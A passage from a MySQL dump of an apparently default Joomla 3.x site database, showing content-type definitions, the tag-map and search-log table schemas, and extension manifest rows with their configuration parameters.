Client','com_banners.client','{\"special\":{\"dbtable\":\"#__banner_clients\",\"key\":\"id\",\"type\":\"Client\",\"prefix\":\"BannersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_banners\\/models\\/forms\\/client.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\"], \"ignoreChanges\":[\"checked_out\", \"checked_out_time\"], \"convertToInt\":[], \"displayLookup\":[]}'),(14,'User Notes','com_users.note','{\"special\":{\"dbtable\":\"#__user_notes\",\"key\":\"id\",\"type\":\"Note\",\"prefix\":\"UsersTable\"}}','','','','{\"formFile\":\"administrator\\/components\\/com_users\\/models\\/forms\\/note.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\", \"publish_up\", \"publish_down\"],\"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\"], \"convertToInt\":[\"publish_up\", \"publish_down\"],\"displayLookup\":[{\"sourceColumn\":\"catid\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}, {\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}]}'),(15,'User Notes Category','com_users.category','{\"special\":{\"dbtable\":\"#__categories\",\"key\":\"id\",\"type\":\"Category\",\"prefix\":\"JTable\",\"config\":\"array()\"},\"common\":{\"dbtable\":\"#__ucm_content\",\"key\":\"ucm_id\",\"type\":\"Corecontent\",\"prefix\":\"JTable\",\"config\":\"array()\"}}','','{\"common\":{\"core_content_item_id\":\"id\",\"core_title\":\"title\",\"core_state\":\"published\",\"core_alias\":\"alias\",\"core_created_time\":\"created_time\",\"core_modified_time\":\"modified_time\",\"core_body\":\"description\", \"core_hits\":\"hits\",\"core_publish_up\":\"null\",\"core_publish_down\":\"null\",\"core_access\":\"access\", \"core_params\":\"params\", \"core_featured\":\"null\", \"core_metadata\":\"metadata\", \"core_language\":\"language\", \"core_images\":\"null\", \"core_urls\":\"null\", \"core_version\":\"version\", \"core_ordering\":\"null\", \"core_metakey\":\"metakey\", \"core_metadesc\":\"metadesc\", \"core_catid\":\"parent_id\", \"core_xreference\":\"null\", \"asset_id\":\"asset_id\"}, \"special\":{\"parent_id\":\"parent_id\",\"lft\":\"lft\",\"rgt\":\"rgt\",\"level\":\"level\",\"path\":\"path\",\"extension\":\"extension\",\"note\":\"note\"}}','','{\"formFile\":\"administrator\\/components\\/com_categories\\/models\\/forms\\/category.xml\", \"hideFields\":[\"checked_out\",\"checked_out_time\",\"version\",\"lft\",\"rgt\",\"level\",\"path\",\"extension\"], \"ignoreChanges\":[\"modified_user_id\", \"modified_time\", \"checked_out\", \"checked_out_time\", \"version\", \"hits\", \"path\"], \"convertToInt\":[\"publish_up\", \"publish_down\"], \"displayLookup\":[{\"sourceColumn\":\"created_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"}, {\"sourceColumn\":\"access\",\"targetTable\":\"#__viewlevels\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"},{\"sourceColumn\":\"modified_user_id\",\"targetTable\":\"#__users\",\"targetColumn\":\"id\",\"displayColumn\":\"name\"},{\"sourceColumn\":\"parent_id\",\"targetTable\":\"#__categories\",\"targetColumn\":\"id\",\"displayColumn\":\"title\"}]}'); /*!40000 ALTER TABLE `jos_content_types` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_contentitem_tag_map` -- DROP TABLE IF EXISTS `jos_contentitem_tag_map`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_contentitem_tag_map` ( `type_alias` varchar(255) NOT NULL DEFAULT '', `core_content_id` int(10) unsigned NOT NULL COMMENT 'PK from the core content table', `content_item_id` int(11) NOT NULL COMMENT 'PK from the content type table', `tag_id` int(10) unsigned NOT NULL COMMENT 'PK from the tag table', `tag_date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP COMMENT 'Date of most recent save for this tag-item', `type_id` mediumint(8) NOT NULL COMMENT 'PK from the content_type table', UNIQUE KEY `uc_ItemnameTagid` (`type_id`,`content_item_id`,`tag_id`), KEY `idx_tag_type` (`tag_id`,`type_id`), KEY `idx_date_id` (`tag_date`,`tag_id`), KEY `idx_tag` (`tag_id`), KEY `idx_type` (`type_id`), KEY `idx_core_content_id` (`core_content_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Maps items from content tables to tags'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_contentitem_tag_map` -- LOCK TABLES `jos_contentitem_tag_map` WRITE; /*!40000 ALTER TABLE `jos_contentitem_tag_map` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_contentitem_tag_map` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_core_log_searches` -- DROP TABLE IF EXISTS `jos_core_log_searches`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_core_log_searches` ( `search_term` varchar(128) NOT NULL DEFAULT '', `hits` int(10) unsigned NOT NULL DEFAULT '0' ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_core_log_searches` -- LOCK TABLES `jos_core_log_searches` WRITE; /*!40000 ALTER TABLE `jos_core_log_searches` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_core_log_searches` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_extensions` -- DROP TABLE IF EXISTS `jos_extensions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_extensions` ( `extension_id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(100) NOT NULL, `type` varchar(20) NOT NULL, `element` varchar(100) NOT NULL, `folder` varchar(100) NOT NULL, `client_id` tinyint(3) NOT NULL, `enabled` tinyint(3) NOT NULL DEFAULT '1', `access` int(10) unsigned DEFAULT NULL, `protected` tinyint(3) NOT NULL DEFAULT '0', `manifest_cache` text NOT NULL, `params` text NOT NULL, `custom_data` text NOT NULL, `system_data` text NOT NULL, `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `ordering` int(11) DEFAULT '0', `state` int(11) DEFAULT '0', PRIMARY KEY (`extension_id`), KEY `element_clientid` (`element`,`client_id`), KEY `element_folder_clientid` (`element`,`folder`,`client_id`), KEY `extension` (`type`,`element`,`folder`,`client_id`) ) ENGINE=InnoDB AUTO_INCREMENT=10051 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_extensions` -- LOCK TABLES `jos_extensions` WRITE; /*!40000 ALTER TABLE `jos_extensions` DISABLE KEYS */; INSERT INTO `jos_extensions` VALUES (1,'com_mailto','component','com_mailto','',0,1,1,1,'{\"name\":\"com_mailto\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MAILTO_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(2,'com_wrapper','component','com_wrapper','',0,1,1,1,'{\"name\":\"com_wrapper\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_WRAPPER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(3,'com_admin','component','com_admin','',1,1,1,1,'{\"name\":\"com_admin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_ADMIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(4,'com_banners','component','com_banners','',1,1,1,0,'{\"name\":\"com_banners\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_BANNERS_XML_DESCRIPTION\",\"group\":\"\"}','{\"purchase_type\":\"3\",\"track_impressions\":\"0\",\"track_clicks\":\"0\",\"metakey_prefix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(5,'com_cache','component','com_cache','',1,1,1,1,'{\"name\":\"com_cache\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(6,'com_categories','component','com_categories','',1,1,1,1,'{\"name\":\"com_categories\",\"type\":\"component\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(7,'com_checkin','component','com_checkin','',1,1,1,1,'{\"name\":\"com_checkin\",\"type\":\"component\",\"creationDate\":\"Unknown\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2008 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CHECKIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(8,'com_contact','component','com_contact','',1,1,1,0,'{\"name\":\"com_contact\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTACT_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_contact_category\":\"hide\",\"show_contact_list\":\"0\",\"presentation_style\":\"sliders\",\"show_name\":\"1\",\"show_position\":\"1\",\"show_email\":\"0\",\"show_street_address\":\"1\",\"show_suburb\":\"1\",\"show_state\":\"1\",\"show_postcode\":\"1\",\"show_country\":\"1\",\"show_telephone\":\"1\",\"show_mobile\":\"1\",\"show_fax\":\"1\",\"show_webpage\":\"1\",\"show_misc\":\"1\",\"show_image\":\"1\",\"image\":\"\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"contact_icons\":\"0\",\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"show_headings\":\"1\",\"show_position_headings\":\"1\",\"show_email_headings\":\"0\",\"show_telephone_headings\":\"1\",\"show_mobile_headings\":\"0\",\"show_fax_headings\":\"0\",\"allow_vcard_headings\":\"0\",\"show_suburb_headings\":\"1\",\"show_state_headings\":\"1\",\"show_country_headings\":\"1\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"0\",\"redirect\":\"\",\"show_category_crumb\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(9,'com_cpanel','component','com_cpanel','',1,1,1,1,'{\"name\":\"com_cpanel\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CPANEL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10,'com_installer','component','com_installer','',1,1,1,1,'{\"name\":\"com_installer\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_INSTALLER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(11,'com_languages','component','com_languages','',1,1,1,1,'{\"name\":\"com_languages\",\"type\":\"component\",\"creationDate\":\"2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','{\"administrator\":\"en-GB\",\"site\":\"en-GB\"}','','',0,'0000-00-00 00:00:00',0,0),(12,'com_login','component','com_login','',1,1,1,1,'{\"name\":\"com_login\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(13,'com_media','component','com_media','',1,1,0,1,'{\"name\":\"com_media\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MEDIA_XML_DESCRIPTION\",\"group\":\"\"}','{\"upload_extensions\":\"bmp,csv,doc,gif,ico,jpg,jpeg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,GIF,ICO,JPG,JPEG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\",\"upload_maxsize\":\"10\",\"file_path\":\"images\",\"image_path\":\"images\",\"restrict_uploads\":\"1\",\"allowed_media_usergroup\":\"3\",\"check_mime\":\"1\",\"image_extensions\":\"bmp,gif,jpg,png\",\"ignore_extensions\":\"\",\"upload_mime\":\"image\\/jpeg,image\\/gif,image\\/png,image\\/bmp,application\\/x-shockwave-flash,application\\/msword,application\\/excel,application\\/pdf,application\\/powerpoint,text\\/plain,application\\/x-zip\",\"upload_mime_illegal\":\"text\\/html\",\"enable_flash\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(14,'com_menus','component','com_menus','',1,1,1,1,'{\"name\":\"com_menus\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MENUS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(15,'com_messages','component','com_messages','',1,1,1,1,'{\"name\":\"com_messages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MESSAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(16,'com_modules','component','com_modules','',1,1,1,1,'{\"name\":\"com_modules\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MODULES_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(17,'com_newsfeeds','component','com_newsfeeds','',1,1,1,0,'{\"name\":\"com_newsfeeds\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_feed_image\":\"1\",\"show_feed_description\":\"1\",\"show_item_description\":\"1\",\"feed_word_count\":\"0\",\"show_headings\":\"1\",\"show_name\":\"1\",\"show_articles\":\"0\",\"show_link\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"display_num\":\"\",\"show_pagination_limit\":\"1\",\"show_pagination\":\"1\",\"show_pagination_results\":\"1\",\"show_cat_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(18,'com_plugins','component','com_plugins','',1,1,1,1,'{\"name\":\"com_plugins\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_PLUGINS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(19,'com_search','component','com_search','',1,1,1,0,'{\"name\":\"com_search\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_SEARCH_XML_DESCRIPTION\",\"group\":\"\"}','{\"enabled\":\"0\",\"show_date\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(20,'com_templates','component','com_templates','',1,1,1,1,'{\"name\":\"com_templates\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_TEMPLATES_XML_DESCRIPTION\",\"group\":\"\"}','{\"template_positions_display\":\"0\",\"upload_limit\":\"2\",\"image_formats\":\"gif,bmp,jpg,jpeg,png\",\"source_formats\":\"txt,less,ini,xml,js,php,css\",\"font_formats\":\"woff,ttf,otf\",\"compressed_formats\":\"zip\"}','','',0,'0000-00-00 00:00:00',0,0),(21,'com_weblinks','component','com_weblinks','',1,1,1,0,'{\"name\":\"com_weblinks\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_comp_description\":\"1\",\"comp_description\":\"\",\"show_link_hits\":\"1\",\"show_link_description\":\"1\",\"show_other_cats\":\"0\",\"show_headings\":\"0\",\"show_numbers\":\"0\",\"show_report\":\"1\",\"count_clicks\":\"1\",\"target\":\"0\",\"link_icons\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(22,'com_content','component','com_content','',1,1,0,1,'{\"name\":\"com_content\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTENT_XML_DESCRIPTION\",\"group\":\"\"}','{\"article_layout\":\"_:default\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"info_block_position\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_readmore\":\"0\",\"show_readmore_title\":\"0\",\"readmore_limit\":\"100\",\"show_tags\":\"1\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"urls_position\":\"0\",\"show_publishing_options\":\"1\",\"show_article_options\":\"1\",\"show_urls_images_frontend\":\"0\",\"show_urls_images_backend\":\"0\",\"targeta\":0,\"targetb\":0,\"targetc\":0,\"float_intro\":\"left\",\"float_fulltext\":\"left\",\"category_layout\":\"_:blog\",\"show_category_heading_title_text\":\"0\",\"show_category_title\":\"0\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"1\",\"show_empty_categories\":\"0\",\"show_no_articles\":\"1\",\"show_subcat_desc\":\"0\",\"show_cat_num_articles\":\"0\",\"show_base_description\":\"0\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_num_articles_cat\":\"1\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"1\",\"num_links\":\"4\",\"multi_column_order\":\"0\",\"show_subcategory_content\":\"0\",\"show_pagination_limit\":\"1\",\"filter_field\":\"hide\",\"show_headings\":\"1\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"1\",\"list_show_author\":\"1\",\"orderby_pri\":\"order\",\"orderby_sec\":\"rdate\",\"order_date\":\"published\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"show_feed_link\":\"1\",\"feed_summary\":\"0\",\"feed_show_readmore\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(23,'com_config','component','com_config','',1,1,0,1,'{\"name\":\"com_config\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONFIG_XML_DESCRIPTION\",\"group\":\"\"}','{\"filters\":{\"1\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"6\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"7\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"2\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"3\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"4\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"5\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"8\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"}}}','','',0,'0000-00-00 00:00:00',0,0),(24,'com_redirect','component','com_redirect','',1,1,0,1,'{\"name\":\"com_redirect\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(25,'com_users','component','com_users','',1,1,0,1,'{\"name\":\"com_users\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_USERS_XML_DESCRIPTION\",\"group\":\"\"}','{\"allowUserRegistration\":\"1\",\"new_usertype\":\"2\",\"useractivation\":\"1\",\"frontend_userparams\":\"1\",\"mailSubjectPrefix\":\"\",\"mailBodySuffix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(27,'com_finder','component','com_finder','',1,1,0,0,'','{\"show_description\":\"1\",\"description_length\":255,\"allow_empty_query\":\"0\",\"show_url\":\"1\",\"show_advanced\":\"1\",\"expand_advanced\":\"0\",\"show_date_filters\":\"0\",\"highlight_terms\":\"1\",\"opensearch_name\":\"\",\"opensearch_description\":\"\",\"batch_size\":\"50\",\"memory_table_limit\":30000,\"title_multiplier\":\"1.7\",\"text_multiplier\":\"0.7\",\"meta_multiplier\":\"1.2\",\"path_multiplier\":\"2.0\",\"misc_multiplier\":\"0.3\",\"stemmer\":\"porter_en\"}','','',0,'0000-00-00 00:00:00',0,0),(28,'com_joomlaupdate','component','com_joomlaupdate','',1,1,0,1,'{\"legacy\":false,\"name\":\"com_joomlaupdate\",\"type\":\"component\",\"creationDate\":\"February 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.2\",\"description\":\"COM_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','{\"updatesource\":\"sts\",\"customurl\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(29,'com_tags','component','com_tags','',1,1,1,1,'{\"name\":\"com_tags\",\"type\":\"component\",\"creationDate\":\"December 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"COM_TAGS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(30,'com_contenthistory','component','com_contenthistory','',1,1,1,0,'{\"name\":\"com_contenthistory\",\"type\":\"component\",\"creationDate\":\"May 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_CONTENTHISTORY_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(31,'com_ajax','component','com_ajax','',1,1,1,0,'{\"name\":\"com_ajax\",\"type\":\"component\",\"creationDate\":\"August 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_AJAX_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(32,'com_postinstall','component','com_postinstall','',1,1,1,1,'{\"name\":\"com_postinstall\",\"type\":\"component\",\"creationDate\":\"September 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.0\",\"description\":\"COM_POSTINSTALL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(100,'PHPMailer','library','phpmailer','',0,1,1,1,'{\"name\":\"PHPMailer\",\"type\":\"library\",\"creationDate\":\"2001\",\"author\":\"PHPMailer\",\"copyright\":\"(c) 2001-2003, Brent R. Matzelle, (c) 2004-2009, Andy Prevost. All Rights Reserved., (c) 2010-2013, Jim Jagielski. All Rights Reserved.\",\"authorEmail\":\"jimjag@gmail.com\",\"authorUrl\":\"https:\\/\\/github.com\\/PHPMailer\\/PHPMailer\",\"version\":\"5.2.6\",\"description\":\"LIB_PHPMAILER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 